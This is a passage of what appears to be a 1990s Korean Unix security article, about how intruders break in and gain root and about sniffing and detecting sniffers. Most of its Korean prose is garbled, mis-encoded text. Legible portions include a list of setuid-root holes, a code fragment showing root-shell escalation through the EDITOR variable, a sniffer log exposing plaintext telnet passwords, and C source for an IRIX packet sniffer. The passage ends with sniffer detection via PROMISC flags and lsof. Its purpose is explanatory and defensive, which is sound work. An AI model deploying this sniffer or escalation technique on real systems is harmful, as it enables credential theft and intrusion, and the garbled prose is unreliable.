¼¼È÷ Åø °³¹ßÀ» ½ÃÀÛÇÏ°í ÀÖ´Ù. º¸¾Èµµ±¸´Â Å©°Ô Á¡°Ëµµ±¸¿Í
°¨½Ãµµ±¸·Î ³ª´²Áö´Âµ¥ ´Ù½Ã ·ÎÄà ȣ½ºÆ®¿ë°ú ³×Æ®¿öÅ©¿ëÀ¸·Î ³ª´ ¼ö ÀÖ´Ù.
Local host check : cops, tiger,
crack
monitor: tripwire, ttywatcher
Network check : satan, iss,
nfsbug, ypx
monitor: netlog
ÇØÄ¿°¡ ÄÄÇ»ÅÍ¿¡ ħÀÔÇÏ´Â ¹æ¹ý¿¡´Â ¾î¶² °ÍÀÌ ÀÖ³ª
null & default passwd account
or passwd guessin
g
tftp attack
ethernet sniffing
/etc/hosts.equiv exploit (ƯÈ÷
SunOS 4.1.x)
NFS mount attack
NIS domain name guessing
Sendmail Attack
X window System Attack
WWW Attack
NFS file handle guessing
DNS hack
IP Spoofing
±×¿Ü ´Ù¼ö(¿¹: rexd, AIX rlogin
-froot...)
ÇØÄ¿°¡ ½´ÆÛÀ¯ÀúÀÇ ±Ç¸®¸¦ ȹµæÇÏ´Â ¹æ¹ý¿¡´Â ¾î¶² °ÍÀÌ
ÀÖ³ª.
OS¸¶´Ù ´Ù¸£Áö¸¸ ´ëºÎºÐ Çã¼úÇÑ set-user-id root ÇÁ·Î±×·¥µéÀ»
ÀÌ¿ëÇÑ´Ù.
SunOS 4.1.x¸¦ ¿¹¸¦ µé¾îº¸¸é
/usr/local/bin/autoreply
/usr/ucb/rdist
/bin/mail race
/bin/passwd race
/usr/openwin/bin/loadmodule
sun sendmail 4.1
sendmail
8.6.9 debug hole
À§ÀÇ ¸®½ºÆ®´Â ÀϹÝÀûÀ¸·Î Àß ¾Ë·ÁÁø °ÍµéÀε¥ ±×°Íµé ¸»°íµµ
suid root ÇÁ·Î±×·¥µéÀ» ÀÏ´Ü ¸ðµÎ ½ºÄµÇغ» ÈÄ OS¿Ü¿¡ ´Ù¸¥ ¼Ò
ÇÁÆ®¿þ¾î ÀνºÅç °úÁ¤¿¡¼ »ý±ä °ÍÀÌ ÀÖÀ¸¸é system callµéÀ»
ÃßÀûÇϸç Á¶»çÇÑ´Ù. Ȥ, ¼Ò½º ÆÄÀÏÀÌ °°ÀÌ ÀÖ´Ù¸é ÁÁ´Ù.
¾î´À suid root ÇÁ·Î±×·¥ÀÇ ¼Ò½º Áß¿¡¼..
if (!(editor = getenv("EDITOR")))
editor
= "vi";
if (fork())
(void)
wait(&junk);
else
{
(void)
execlp(editor, editor, fname, NULL);
fprintf(stderr,
"Whoops! Failed to exec %s\n", editor);
exit(1);
}
À§ÀÇ °æ¿ì¶ó¸é ÇØÄ¿´Â search path list¿¡(current directory)¸¦
¸Ç óÀ½ ³õ°í
·çÆ® ½©À» ¸¸µå´Â vi ¶ó´Â
ÀÚ½ÅÀÇ ÇÁ·Î±×·¥À» ¸¸ µç ÈÄ À§ÀÇ suid root ÇÁ·Î±×·¥À»½ÇÇà½ÃŲ´Ù.
±×·¯¸é ·çÆ® ±ÇÇÑÀ¸·Î ÇØÄ¿ÀÇ ÇÁ·Î±×·¥ÀÌ ½ÇÇàµÇ¾î ·çÆ®½©ÀÌ
¸¸µé¾îÁø´Ù. /usr/openwin/bin/loadmodule, IRIX 4.0.x
ÀÇ /usr/lib/vadmin/serial_port
µîÀ» ±×¿Í °°Àº Á¶°ÇÀ» ÀÌ¿ëÇؼ °ø°ÝÇÑ´Ù.
ÄÄÇ»ÅÍ¿¡ ħÀÔÀÚ°¡ ÀÖ´ÂÁö ¾î¶»°Ô ÆľÇÇϴ°¡
°ü¸®ÀÚÀÇ Áö¼ÓÀûÀÎ °ü½ÉÀÌ Áß¿äÇÏ´Ù. ´Ã ½Ã½ºÅÛ ·Î±×¸¦
È®ÀÎÇÏ°í ÆÄÀÏ ½Ã½ºÅÛÀ» ¸ð´ÏÅÍÇÑ´Ù¸é Á¶±ÝÀÌ¶óµµ º¯È°¡ »ý±â´õ¶óµµ ÆľÇÀÌ °¡´ÉÇÏ´Ù.
º¸¾È °ü·Ã µµ±¸¿Í ÀÚ·á´Â ¾îµð¼ ±¸ÇÒ ¼ö ÀÖ³ª
http://www.cert.org
http://www.8lgm.org
http://www.cert-kr.or.kr
news://comp.security.unix
ftp://ftp.cert.org
ftp://coast.cs.purdue.edu
ftp://ftp.cert-kr.or.kr
ÆÄÀ̾î¿ùÀº ¾î´À ¼±±îÁö ½Å·ÚÇÒ ¼ö ÀÖ³ª
¼³Ä¡¸¦ ÇÏ´Â »ç¶÷ÀÇ º¸¾È Áö½Ä ¹× ÆÄÀ̾î¿ù ÅøŶ ¸Å´º¾ó¿¡
´ëÇÑ ÀÌÇØ Á¤µµ¿¡ µû¶ó ÆíÂ÷°¡ ½É
ÇÏ´Ù. »ó´ç¼öÀÇ ÆÄÀ̾î¿ùÀº À߸ø ¼Â¾÷µÈ ä
¿î¿µµÈ´Ù.
½Ã½ºÅÛ ¹× ³×Æ®¿öÅ© ¸ð´ÏÅ͸µÀ¸·Î ÀÎÇÑ ¼º´ÉÀúÇÏ¿Í °³°³ÀÎÀÇ
ÇÁ¶óÀ̹ö½Ã ħÇع®Á¦´Â ¾î¶»°Ô ÇØ°áÇϳª?
½Ã½ºÅÛ ¸ð´ÏÅ͸µÀ¸·Î ÀÎÇÑ ¼º´É ÀúÇÏ´Â °ÅÀÇ ¾ø´Ù°í º¸¾Æµµ
ÁÁ´Ù. ¼¼¼Ç ¸ð´ÏÅÍ ÅøÀÎ ttywatcher³ª ÆÄÀÏ ½Ã½ºÅÛ ¸ð´ÏÅÍ ÅøÀÎ tri
pwire´Â °ü¸®ÀÚ°¡ ÇÊ¿äÇÒ ¶§ Àá½Ã »ç¿ëÇϰųª cron jobÀ¸·Î
½ÇÇàµÇ±â ¶§¹®¿¡ º°´Ù¸¥ ¿µÇâÀÌ ¾ø´Ù. ±×·¯³ª ³×Æ®¿öÅ© ¸ð´ÏÅ͸µÀº
¾öû³ ¼º´É ÀúÇϸ¦ °¡Á®¿Â´Ù. ½ãÀÇ nit¸¦ »ç¿ëÇϸé ÇÊÅÍ
ÆÐÅÏ¿¡ µû¶ó ´Þ¶óÁö±ä ÇÏÁö¸¸ 30~70%±îÁöÀÇ ÆÐŶ ¼Õ½ÇÀÌ »ý±â¹Ç·Î(spr
ayÇßÀ» ¶§) ³×Æ®¿öÅ©ÂÊÀÇ ÆÛÆ÷¸Õ½º°¡ ¸¹ÀÌ ¶³¾îÁø´Ù. ±×·¡¼
tcpdump 3.0ºÎÅÍ´Â BPF(BSD Packet Filter)¸¦
»ç¿ëÇÏ¿© ½ºÅà ±¸Á¶¸¦ »ç¿ëÇÏ´Â SunÀÇ NITº¸´Ù´Â 10~150¹è,
CSPF(CMU/Stanford Packet Filter) º¸´Ù´Â
1.5~20¹è ºü¸¥ ¼º´ÉÇâ»óÀ» °ÅµÎ¾ú´Ù(Comment by chan@ra.snu.ac.kr)
°³ÀÎÀÇ ÇÁ¹ÙÀ̹ö½Ã ħÇØ ¹®Á¦´Â °ü¸®ÀÚÀÇ µµ´ö¼º¿¡ ´Þ·Á
Àִµ¥ ¿Ü±¹¿¡¼´Â ½Ã½ºÅÛ, ȤÀº ½ÃÅ¥¸®Æ¼ °ü¸®ÀÚ´Â ¹Ýµå½Ã ¼±¼¸¦ °Å Ä£´Ù°í ÇÑ´Ù.
º¸¾ÈÀ» ÀϹæÀûÀ¸·Î °ÈÇÏ´Ù º¸¸é ÄÄÇ»ÅÍÀÇ Æí¸®¼ºÀÌ ¶³¾îÁø´Ù°í
Çϴµ¥, ¾î´À ¼±±îÁö º¸¾ÈÀ» °ÈÇÏ´Â°Ô ¹Ù¶÷Á÷ÇÑ°¡.
ÀÏ·Ê·Î XÀ©µµ¿ì ½Ã½ºÅÛÀÇ º¸¾ÈÀ» °ÈÇÏ´Â °ÍÀ¸·Î MIT-MAG
IC-COOKIE ¶ó´Â ÅäÅ«¹æ½ÄÀ» ÀÌ¿ëÇÑ xauth¶ó´Â ÇÁ·Î±×·¥ÀÌ
ÀÖ´Ù.
±×·¯ ³ª ÀÌ°ÍÀÇ »ç¿ë¹æ¹ýÀº °¡È÷ »ìÀÎÀûÀÌ´Ù. X ¾ÖÇø®ÄÉÀ̼ÇÀ»
½ÇÇàÇÒ ¶§¸¶´Ù ÀÏÀÏÀÌ ÅäÅ«À» ³Ñ°ÜÁà¾ß Çϱ⠶§¹®ÀÌ´Ù. µû¶ó¼ Àû´ç ÇÑ ¼±ÀÌ
Áß¿äÇÏ´Ù. ±×¸®°í ±×°ÍÀº ÄÄÇ»ÅÍÀÇ Á߿伺¿¡ ¹ÐÁ¢ÇÑ °ü°è°¡
ÀÖ´Ù. ±¹°¡ Á¤º¸±â°üÀÇ È£½ºÆ®¿Í ÀÎÅÍ³Ý ½Ç½À¿ëÀ¸·Î »ç¿ë ÇÏ´Â ´ëÇÐÀÇ ³°Àº
¿öÅ©½ºÅ×À̼ÇÀ» ºñ±³Çؼ »ý°¢ÇÏ¸é µÈ´Ù. ½ÇÁ¦·Î ±¹³»ÀÇ
¸¹Àº ´ëÇÐÀÇ È£½ºÆ®µéÀº ÀüÇô º¸¾ÈÀÌ °í·ÁµÇ°í ÀÖÁö ¾Ê¾Æ¼ Ãʺ¸ ÇØÄ¿µéÀÇ ÁÁÀº ¿¬½À
´ë»óÀÌ µÇ±âµµ ÇÑ´Ù.
Àû´çÇÑ ¼±À» ½Ç¿ëÀûÀ¸·Î ±ÔÁ¤Áö¾î º»´Ù¸é "°ü¸®ÀÚÀÇ
¸ÞÀϹڽº¿¡ »ç¿ëÀÚµé·ÎºÎÅÍÀÇ ºÒÆò°ú ºÒ¸¸ ¸ÞÀÏÀÌ ½Ã½ºÅÛ ·Î±× ¸®Æ÷ Æ® ¸ÞÀϺ¸´Ù
´õ ¸¹ÀÌ
½×ÀÌ´Â ¶§ÀÌ´Ù"
ÃֽŠÇØÅ· À¯Çüµé
ÃÖ±Ù¿¡´Â ÇØÅ·±â¼úÀÌ °íµµ·Î ¹ß´ÞµÅ ¿¹Àü¿¡´Â »ó»óÇÒ ¼öµµ
¾ø¾ú´ø °í³µµÀÇ ÇØÅ· ±â¼úµéÀÌ Á¸ÀçÇÏ°Ô µÆ´Ù. ¿¹Àü¿¡´Â ±â²¯ÇغÁ¾ß °ü¸®ÀÚÀÇ ½Ç¼ö³ª
OS¿¡¼ ½Ç¼ö¸¦ ÇÑ ÇÁ·Î±×·¥µéÀ» ¾Ç¿ëÇØ °ü¸®ÀÚÀÇ ±ÇÇÑÀ»
¾ò´Â °ÍÀÌ °íÀÛÀ̾úÁö¸¸, ÀÌÁ¦´Â ³×Æ®¿öÅ© »óÀ» Èê·¯´Ù´Ï´Â Á¤º¸ÀÇ ±âº»´ÜÀ§ÀÎ
ÆÐŶ(packet: ³×Æ®¿öÅ©»ó¿¡ Á¤º¸ ¸¦ ¼Û¼ö½ÅÇÒ ¶§ °¡Àå ±âº»ÀÌ
µÇ´Â Á¤º¸´ÜÀ§)À» ÇϳªÇϳª Á¶ÀÛÇØ ÇØÅ·À» ÇÏ°Ô µÆ´Ù.
ÀÌ·± °í³µµ ÇØÅ·ÀÇ ¿¹´Â ÆÐŶ ½º´ÏÆÛ¸µ(packet sniffing)°ú,
IP ½ºÇªÇÎ(IP Spoofing: IP »ç±âÄ¡±â),
NFS(Network File System) file handle guessing, dns server
cache poisoning
(³×ÀÓ
¼¹ö(IP ¿¡ ÀÏ´ëÀÏ ¸ÅÄ¡µÇ´Â ³×ÀÓ ¾îµå·¹½º¸¦ °ü¸®ÇÏ´Â
È£½ºÆ®)¿¡ Àâ ÀÔÇØ°¡Â¥ È£½ºÆ®µéÀ» ¸¸µé°í ³ª¿À´Â °Í) µîÀÌ Àִµ¥ ÀÌÁß¿¡¼
½º´ÏÆÛ¸µ°ú ½ºÇªÇο¡ ´ëÇؼ¸¸ ´Ù·ï º¸±â·Î ÇÏÀÚ.
°¡Àå ½É°¢ÇÑ ÇØÅ· ±â¼ú, Sniffing
ÆÐŶµéÀº ÀÌ´õ³Ý ÄÉÀ̺íÀ» Ÿ°í Àü¼ÛÀÌ µÈ´Ù. ÀÌ ÆÐŶµéÀº
¾î¶² À¯Àú°¡ ¾î´À È£½ºÆ®¿¡ ·Î±äÇß´Ù´Â Á¤º¸µûÀ§¸¦ °¡Áö°í Àִµ¥, ÀÌ´õ³Ý
µð¹ÙÀ̽º¸¦ ÄÁÆ®·ÑÇØ Èê·¯°¡´Â ÆÐŶ¿¡¼ ¿øÇÏ´Â Á¤º¸ÀÎ
À¯ÀúµéÀÇ Æнº¿öµå¸¦ ¾Ë¾Æ³»´Â °ÍÀ¸·Î¼ ¿äÁò °¡Àå ½É°¢ÇÑ ¹®Á¦°¡ µÇ´Â ÇØÅ· ±â¼úÀÌ´Ù.
ÃÖ±Ù ÇØÄ¿µéÀÇ °ø°ÝµéÀÇ Åë°è¸¦ ³»º» ÀڷḦ º¸¸é ½º´ÏÇο¡
ÀÇÇÑ °ø°ÝÀÌ °¡Àå ¸¹Àº °ÍÀ¸·Î ³ªÅ¸³ª°í ÀÖ´Ù.
½º´ÏÆÛ(Sniffer)¶õ ¹«¾ùÀΰ¡?
½º´ÏÆÛ´Â ³×Å©¿öÅ©ÀÇ ÇÑ È£½ºÆ®¿¡¼ ½ÇÇàµÇ¾î ±× ÁÖÀ§¸¦
Áö³ª ´Ù´Ï´Â ÆÐŶµéÀ» ¿³º¸´Â ÇÁ·Î±×·¥À¸·Î¼ °èÁ¤°ú Æнº¿öµå¸¦ ¾Ë¾Æ ³»±â À§Çؼ
ħÀÔÀڵ鿡 ÀÇÇØ ÀÚÁÖ »ç¿ëµÇ´Âµ¥ ¾Æ¹«¸® ³×Æ®¿öÅ© º¸¾È¿¡
½Å°æÀ» ¾´ È£½ºÆ®¶óµµ ÁÖº¯ÀÇ È£½ºÆ®°¡ °ø°Ý´çÇؼ ½º´Ï ÇÎÀ» À§ÇØ »ç¿ëµÈ´Ù¸é
¹«·ÂÇØÁú ¼ö ¹Û¿¡ ¾ø´Ù. ÀÌÇظ¦ µ½±â À§ÇØ ½ÇÁ¦ ½º´ÏÇÎ
¼¼¼ÇÀ» °¡Áö°í ¼³¸íÇÑ´Ù.
mordor# ./sniffit
Log started at => Mon Apr
8 20:29:04 [pid 10937]
-- TCP/IP LOG -- TM: Mon Apr
8 20:29:44 --
PATH: rohan.kaist.ac.kr(1270)
=> gondor.kaist.ac.kr(telnet)
STAT: Mon Apr 8 20:29:48, 30
pkts, 77 bytes [TH_FIN]
DATA: (255)(253)^C(255)(251)^X(255)(251)^_(255)(251)
(255)(251)!(255)(251)"(255)(253)^E(255)(251)#(255)(251)$(255)(250)^X
: IRIS-ANSI-NET(255)(240)(255)(253)^A(255)(252)^Aaragorn
: evenstar
: cls
: du
-s -k *
: elm
awen
-- TCP/IP LOG -- TM: Mon Apr
8 20:31:57 --
PATH: mordor.kaist.ac.kr(2389)
=> gondor.kaist.ac.kr(telnet)
STAT: Mon Apr 8 20:32:24, 106
pkts, 128 bytes [DATA LIMIT]
DATA:
(255)(253)&(255)(251)&(255)(253)^C(255)(251)^X(255)(251)^_(255
)(251)
(255)(251)!(255)(251)"(255)(251)$(255)(253)^E(255)(251)#(255)(250)^_
: P
: ^X(255)(240)(255)(250)
: 9600,9600(255)(240)(255)(250)^X
: XTERM(255)(240)(255)(253)^A(255)(252)^Agaladriel
: shwjdtjr=JD
:
: setenv
DISPLAY rohan.kaist.ac.kr:0.0
: ne
À§´Â ½º´ÏÆÛ ÇÁ·Î±×·¥À» µ¹¸° °á°úÀÌ´Ù. gondor, mordor,
rohanÀº MÇаúÀÇ Àü»ê½ÇÀÇ ±â°èµéÀε¥ ÀÌ¹Ì Ä§ÀÔÀÚ´Â
mordor¿¡¼ ·çÆ® ±ÇÇÑÀ» µû³Â¾ú°í ½º´ÏÆÛ ÇÁ·Î±×·¥À» ½ÇÇà½ÃÅ°°í
ÀÖ´Ù(½º´ÏÆÛ°¡ µ¿ÀÛÇϱâ À§Çؼ´Â ³×Å©¿öÅ© µð¹ÙÀ̽ºÀÇ Á¶ÀÛÀÌ ÇÊ¿äÇѵ¥
ÀÌ´Â ·çÆ®(½Ã½ºÅÛ °ü¸®ÀÚ)¸¸ÀÌ ÇÒ ¼ö ÀÖ´Ù). ±×·¸´Ù¸é ¹°¸®ÀûÀÎ
³×Å©¿öÅ© ±¸µµ¿¡¼ ÀÎÁ¢ÇØÀִ ȣ½ºÆ®µéÀº ¸ðµÎ ½º´ÏÇÎÀ» ´çÇÏ°Ô µÈ´Ù .
óÀ½ ºí·°¿¡¼ rohan¿¡¼ gondor·Î aragornÀ̶ó´Â °èÁ¤À¸·Î
telnet ·Î±äÀ» ÇÑ °ÍÀÌ ÀâÇû´Âµ¥ À̶§ Æнº¿öµå°¡
evenstarÀÓÀ» ¾Ë ¼ö ÀÖ´Ù. ±×¸®°í ·Î±ä Á÷ÈÄ¿¡ ½ÇÇàÇÑ ¸î¸î
¸í·É±îÁö ÀâÇû´Ù. ÀϹÝÀûÀ¸·Î ½º´ÏÆÛ ÇÁ·Î±×·¥Àº ºñ±³Àû ÀÛÀº Å©±âÀÇ
Á¦ÇÑµÈ ¹öÆÛ¸¦ »ç¿ëÇϴµ¥ ÇÊ¿ä¿¡
µû¶ó ±×°ÍÀ» ´ÃÀ̱⵵ ÇÑ´Ù.
ÀÌ´õ³ÝÀÇ ¼³°è»ó ¾àÁ¡°ú ³×Æ®¿öÅ© ½º´ÏÆÛÀÇ ¿ø¸®
°¡Àå ÀϹÝÀûÀÎ LANÀÇ ±¸¼º ¹æ¹ýÀº ÀÌ´õ³ÝÀ» »ç¿ëÇÏ´Â °ÍÀ¸·Î
ÁÖº¯¿¡¼ °¡Àå ½±°Ô Á¢ÇÏ´Â °æ¿ìÀÌ´Ù. ÀÌ´õ³ÝÀ» ÅëÇÑ Åë½Å ¹æ¹ýÀº ¸Å¿ì
°£´ÜÇÏ´Ù. A¶ó´Â È£½ºÆ®°¡ B¶ó´Â È£½ºÆ®·Î ÆÐŶÀ» º¸³»°í
½Í´Ù¸é È£½ºÆ® A´Â B¿ÍÀÇ ¹èŸÀûÀÎ ¿¬°áÀ» ÅëÇÏ´Â °ÍÀÌ ¾Æ´Ï¶ó ±× ÆÐŶÀ»
ÀÌ´õ³Ý¿¡ »Ñ¸°´Ù. ±×¸®°í ±× ÆÐŶÀº ÀϹÝÀûÀ¸·Î ¼ö½Å ÁÖ¼ÒÀÇ
È£½ºÆ®¸¸ÀÌ ¹Þµµ·Ï ±â´ëµÈ´Ù. Áï ÀϹÝÀûÀ¸·Î Àڽſ¡°Ô ¿ÀÁö ¾Ê´Â ÆÐŶÀº ¹ÞÁö
¾ÊÀ¸¹Ç·Î È£½ºÆ® B¸¸ÀÌ A°¡ º¸³»´Â ÆÐŶÀ» ¹Þ°Ô µÈ´Ù.
±×·¯³ª ±×°ÍÀº ±â´ë »çÇ×ÀÏ »Ó ¾ðÁ¦¶óµµ ±ú¾îÁú À§ÇèºÎ´ãÀ»
¾È°í ÀÖ´Â ÇÁ·ÎÅäÄÝÀÌ´Ù. ³×Å©¿öÅ© µð¹ÙÀ̽º´Â Àڽſ¡°Ô ¿ÀÁö ¾Ê°í ´Ù¸¥ È£½ºÆ®¸¦
ÇâÇØ Áö³ª°¡´Â ÆÐŶ±îÁö ¹Þ´Â »óÅ¿¡ µé¾î°¥ ¼ö Àִµ¥,
±×¶§¸¦ 'Promiscuous mode'¶ó°í ºÎ¸¥´Ù. ½º´ÏÆÛ´Â ¹Ù·Î ±× »óÅ¿¡¼
µ¿ÀÛÇÑ´Ù. ÀÌ·¸°Ô ³×Æ®¿öÅ©ÀÇ ¼³°è»óÀÇ Ä¿´Ù¶õ ¾àÁ¡ÀÌ ÀÖ±â
¶§¹®¿¡ ½º´ÏÆÛ¿¡ ÀÇÇÑ °ø°ÝÀº Ä¡¸íÀûÀ̸ç ÀϺΠOS¸¦ Á¦ ¿ÜÇÏ°í´Â ã¾Æ³»±â°¡
°ï¶õÇÑ °æ¿ì°¡ ¸¹°í ¸·±â À§Çؼµµ ¸¹Àº ºÎ´ãÀÌ µû¸¥´Ù.
½º´ÏÆÛÀÇ ¼³°è
½º´ÏÆÛ´Â ³Ê¹«³ª ½±°í, ºñ¿ÇÏ°Ô ÇØÅ·À» ÇÒ ¼ö Àֱ⠶§¹®¿¡
ÇØÄ¿µé °£¿¡¼´Â ½º´ÏÆÛ¸¦ ÀÌ¿ëÇÏ´Â ÇØÄ¿¸¦ 3·ù Ãë±ÞÇØ »ó´ëµµ ÇÏÁö ¾Ê´Â´Ù.
ÀÌó·³ ½º´ÏÆÛ´Â
ÇØÄ¿µé »çÀÌ¿¡¼Á¶Â÷ ±Ý±â(?)½ÃµÇ´Â Ä¡»çÇÑ ÇÁ·Î±×·¥ÀÌÁö¸¸
±× ÀÚü·Î´Â ¾ÆÁÖ ÈǸ¢ÇÑ ³×Å©¿öÅ© ÇÁ·Î±× ·¥ÀÌ´Ù. ½ÇÁ¦·Î
´ëºÎºÐÀÇ ³×Æ®¿öÅ© ºÐ¼® ÇÁ·Î±×·¥µéÀº Promiscuous mode¿¡¼
µ¿ÀÛÇÏ¸ç ¶Ç ±×·² ¼ö¹Û¿¡ ¾ø´Ù.
±×¸®°í ½º´ÏÆÛÀÇ ÇÙ½ÉÀ» ÀÌ·ç´Â ÄÚµå´Â ´ëºÎºÐÀÇ OS¿¡¼
µ¶¸³µÈ ÇÁ·ÎÅäÄݷμ Áö¿øÀ» Çϴµ¥ SunOSÀÇ NIT, IRIXÀÇ SNOOPÀÌ
ÁÁÀº ¿¹ÀÌ´Ù. À߸¸ ÀÌ¿ëÇϸé ħÀÔÀÚµéÀ» »ó´ëÇÏ´Â °ü¸®Àڵ鿡°Ô
Å«¹«±â°¡ µÉ ¼ö ÀÖ´Ù. ³×Æ®¿öÅ©¸¦ °¨½ÃÇÏ´Â µ¥ »ç¿ëÇÒ ¼ö ÀÖ´Ù´Â ¸» ÀÌ´Ù.
netlog(ftp://ftp.cert-kr.or.kr/pub/tools/etc/netlog/netlog-1.2.tar.gz)¶ó´Â
ÁÁÀº
ÅøÀÌ ÀÌ¹Ì ÀÖ´Ù. ÀÌ ÅøÀÇ ¼º°ÝÀ» Àß ¸»ÇØÁÖµíÀÌ telnet°ú
ftpÀÇ ¸ðµâÀº Á¦¿ÜµÅ ÀÖ´Ù. Æнº¿öµå ½º´ÏÇο¡ »ç¿ëµÇ´Â °ÍÀ» ¸·±â À§ÇÔÀÏ
°ÍÀÌ´Ù.
½º´ÏÆÛ´Â ÀϹÝÀûÀ¸·Î ´ÙÀ½°ú °°Àº ÀÏ·ÃÀÇ µ¿ÀÛÀ» ÇÏ´Â ÄÚµå·Î
±¸¼ºµÈ´Ù.
³×Æ®¿öÅ© µð¹ÙÀ̽º¸¦ ¿¾î¼ Promiscuous
mode·Î ¸¸µç´Ù.
Áö³ª°¡´Â ¸ðµç ÆÐŶÀ» Àд´Ù.
ÆÐŶÀ» ÇÊÅ͸µÇؼ ¹ß½Å ¹× ¼ö½Å
ÁÖ¼Ò, ¼ºñ½º(telnet, rlogin, ftp, smtp µî), ±×¸®°í °èÁ¤°ú Æнº¿öµå°¡
Æ÷ÇÔµÈ µ¥ÀÌÅ͸¦ ±¸ºÐÇؼ Ãâ·ÂÇÑ´Ù.
3¹øÀÇ ±â´ÉÀ» ÇÏ´Â Äڵ尡 »ý·«µÈ ½º´ÏÆÛ ¼Ò½º¸¦ Âü°í·Î
¼Ò°³ÇÑ´Ù. IRIX¿¡¼ SNOOPÀ» »ç¿ëÇØ Á¦À۵Ǿú´Ù.
/* sgisniff.c by poison@baikdu.kaist.ac.kr
uses SNOOP(7P)
tested on IRIX 5.2, 5.3 */
#include <sys/types.h>
#include <net/raw.h>
#include <netinet/if_ether.h>
#define ETHERHDRPAD RAW_HDRPAD(sizeof(struct
ether_header))
struct etherpacket {
struct
snoopheader snoop;
char
pad[ETHERHDRPAD];
struct
ether_header ether;
char
data[ETHERMTU];
};
main()
{
int
s;
struct
sockaddr_raw sr;
struct
snoopfilter sf;
struct
eth
erpacket ep;
int
cc = 60000, on = 1;
char
buf[100];
s =
socket(PF_RAW, SOCK_RAW, RAWPROTO_SNOOP);
sr.sr_family
= AF_RAW;
sr.sr_port
= 0;
strncpy(sr.sr_ifname,
"ec0", sizeof sr.sr_ifname);
bind(s,
&sr, sizeof sr);
memset((char
*)&sf, 0, sizeof sf);
ioctl(s,
SIOCADDSNOOP, &sf);
setsockopt(s,
SOL_SOCKET, SO_RCVBUF, (char *) &cc, sizeof cc);
ioctl(s,
SIOCSNOOPING, &on);
for
(;;) {
cc
= read(s, (char *) &ep, sizeof ep);
write(1,
(char *)&ep, sizeof ep);
sleep(2);
}
}
½º´ÏÆÛ, ±× ´ëÃ¥°ú ¿¹¹æ
½º´ÏÆÛ Å½Áö
½º´ÏÆÛ´Â Promiscuous mode¿¡¼ µ¿ÀÛÇϱ⠶§¹®¿¡ ³×Å©¿öÅ©
µð¹ÙÀ̽ºÀÇ »óÅ Ç÷¡±×¿¡ 'PROMISC'°¡ ÀÖ´Ù¸é ÀÏ´Ü ½º´ÏÆÛ°¡
µ¹°í ÀÖ´Ù°í »ý°¢Çصµ ÁÁ´Ù. SunOS 4.1.x °°Àº BSD °è¿ÀÇ
À¯´Ð½º³ª IRIX¿¡¼´Â 'ifconfig'¸¦ »ç¿ëÇؼ ½º´ÏÆÛÀÇ
Á¸À縦 È®ÀÎÇÒ ¼ö ÀÖ À¸³ª ´ëºÎºÐÀÇ ´Ù¸¥ À¯´Ð½º(ƯÈ÷ Solaris)¿¡¼´Â
±×°ÍÀÌ ºÒ°¡´ÉÇÏ´Ù.
[baikdu:/circ/kus/poison 2 ]
uname -a
SunOS baikdu 4.1.3-KL 3 sun4m
[baikdu:/circ/kus/poison 3 ]
ifconfig le0
le0: flags=163<UP,BROADCAST,NOTRAILERS,RUNNING,PROMISC>
inet
143.248.1.8 netmask ffffff00 broadcast 143.248.1.0
[eru:/eldar/people/poison 16
] uname -a
IRIX eru 5.3 11091812 IP22 mips
[eru:/eldar/peopl
e/poison 17 ] ifconfig ec0
ec0:
flags=d63<UP,BROADCAST,NOTRAILERS,RUNNING,PROMISC,FILTMULTI,MULTICAST>
inet
134.75.100.53 netmask 0xffff0000 broadcast 134.75.255.255
SunOS 4.1.3, IRIX 5.3 ¿¡¼ ½º´ÏÆÛ ÇÁ·Î±×·¥À» ½ÇÇà½ÃÅ°¸é¼
ifconfig·Î È®ÀÎÇÏ¸é ´ÙÀ½°ú °°´Ù.
µÎ ±â°è¿¡¼ ¸ðµÎ flags¸¦ ³ªÅ¸³»´Â Çà¿¡ 'PROMISC'°¡ ÀÖ´Â
°ÍÀ¸·Î ½º´ÏÆÛ°¡ È®ÀεȴÙ. SunOS 4.1.x¿¡¼ »ç¿ë°¡´ÉÇÑ
cpmÀ̶ó´Â ÇÁ·Î±×·¥ÀÌ Àִµ¥ ifconfig·Î Ç÷¡±×¸¦ Á¶»çÇÏ´Â
°Í°ú °°Àº ±â´ÉÀ» °¡Áø´Ù. ÀϹÝÀûÀ¸·Î ½º´ÏÆÛ´Â ·Î±× ÆÄÀÏÀ» ¸¸µé¾î
µ¥ÀÌÅ͸¦ ¸ðÀº´Ù. µû¶ó¼ ±× ·Î±× ÆÄÀÏÀ» ãÀ» ¼ö ÀÖÀ¸¸é
½º´ÏÆÛ¸¦ ã±â°¡ ½¬¾îÁø´Ù. ¿ì¼± ´ÙÀ½°ú °°Àº °£´ÜÇÑ ¹æ¹ýÀÌ ÀÖ´Ù.
´Ù¸¥ È£½ºÆ®·Î ¿¬°áÀ» ÇÏ¸é ½º´ÏÆÛ ·Î±× ÆÄÀÏ¿¡ ·Î±×°¡
»õ·Î ¸¸µé¾îÁö°Ô µÇ¹Ç·Î¹Ì¸® ¸¸µé¾î µÎ¾ú´ø /tmp/sniff_trapÀ̶õ ÆÄÀÏÀ»
±âÁØÀ¸·Î ÇØ Ã£À» ¼ö°¡ ÀÖ´Ù. ´Ü ºü¸¥ °á°ú¸¦ À§ÇØ ·çÆ®¿¡¼
ÇÁ·Î¼¼½ºÀÇ ¿ì¼±±ÇÀ» ÃÖ´ë·Î ÇÑ´Ù. º¸´Ù È®½ÇÈ÷ Çϱâ À§Çؼ ÇöÀç ¿·ÁÁ® ÀÖ´Â
¸ðµç ÆÄÀÏÀÇ ¸®½ºÆ®¸¦ ¾Ë ¼ö ÀÖ´Ù¸é ±× ¼Ó¿¡ ½º´ÏÆÛ ·Î±×
ÆÄÀϵµ Æ÷ÇԵŠÀÖÀ» °ÍÀ̹ǷΠ½º´ÏÆÛ¸¦ ã´Âµ¥ µµ¿òÀÌ µÈ´Ù.
lsof(ftp://ftp.cert-kr.or.kr/pub/tools/lsof) ÀÌ
¶ó´Â ÅøÀÇ »ç¿ëÀ» ±ÇÇÑ´Ù.
½º´ÏÆÛ ·Î±× ÆÄÀÏÀ» ã¾Æ ¾ø¾Ý´Ù¸é ½º´ÏÆÛ ÇÁ·Î¼¼½º¸¦ ãµµ·Ï
³ë·ÂÇغ»´Ù. ½Ã½ºÅÛÀ» ¸®ºÎÆÃÇÏ¸é µÇ°ÚÁö¸¸ ±×º¸´Ù ħÀÔÀÚ¸¦ ÃßÀû ÇÏ°í ½Í´Ù¸é ±×
ÇÁ·Î¼¼½º¸¦ Á÷Á¢ ã¾Æ³»´Â °ÍÀÌ ¹Ù¶÷Á÷ÇÏ´Ù. ·çÆ®·Î ½ÇÇàµÇ°í
